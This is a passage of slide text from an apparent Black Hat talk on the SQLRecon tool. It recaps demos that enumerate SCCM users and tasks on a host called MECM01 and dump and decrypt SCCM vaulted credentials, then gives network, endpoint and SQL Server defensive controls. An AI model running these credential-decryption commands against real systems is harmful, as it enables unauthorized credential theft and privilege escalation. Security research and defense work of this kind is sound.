  • 64. #BHUSA @BlackHatEvents Information Classification: General Demo 9 Recap - Used SQLRecon to connect to the database of MECM01 and list databases - Enumerated users who are authorized to authenticate against SCCM - Listed tasks configured in SCCM SQLRecon.exe /a:WinToken /h:MECM01 /m:databases SQLRecon.exe /a:WinToken /h:MECM01 /database:CM_KAW /m:sUsers SQLRecon.exe /a:WinToken /h:MECM01 /database:CM_KAW /m:sTaskList
  • 65. #BHUSA @BlackHatEvents Information Classification: General Demo 10 Privilege Escalation: SCCM / MECM
  • 67. #BHUSA @BlackHatEvents Information Classification: General Demo 10 Recap - Used SQLRecon to connect to the database of MECM01 and list vaulted credentials - Decrypted SCCM vaulted credentials (shout out to Adam Chester @_xpn_) SQLRecon.exe /a:WinToken /h:MECM01 /database:CM_KAW /m:sCredentials SQLRecon.exe /a:WinToken /h:MECM01 /database:CM_KAW /m:sDecryptCredentials
  • 68. #BHUSA @BlackHatEvents Information Classification: General Defensive Considerations
  • 69. #BHUSA @BlackHatEvents Information Classification: General Defensive Considerations Check out the Wiki for comprehensive Prevention, Detection and Mitigation guidance! github.com/xforcered/SQLRecon/wiki
  • 70. #BHUSA @BlackHatEvents Information Classification: General Defensive Considerations Top 3 Network Security Controls - Account for network routes to MS SQL Server - Limit routes to only authorized set of systems/subnets - Ensure you are receiving telemetry via network logging and monitoring tools github.com/xforcered/SQLRecon/wiki
  • 71. #BHUSA @BlackHatEvents Information Classification: General Defensive Considerations Top 3 Endpoint Security Controls - Regularly control tune your EDR solutions - Evaluate if your host-based security controls (EDR / AV) supports scanning of .NET assemblies in memory - Application allow listing github.com/xforcered/SQLRecon/wiki
  • 72. #BHUSA @BlackHatEvents Information Classification: General Defensive Considerations Top 3 MS SQL Server Security Controls - Follow the Microsoft SQL Server security best practices - Consider removing or restricting the BUILTINUsers account and low privilege groups from authenticating against MS SQL Server instances - Evaluate impersonation and MS SQL Server links github.com/xforcered/SQLRecon/wiki
  • 73. #BHUSA @BlackHatEvents Information Classification: General @sanjivkawa github.com/skahwah Thank You IBM X-Force Red @xforcered github.com/xforcered/SQLRecon Question or Comments?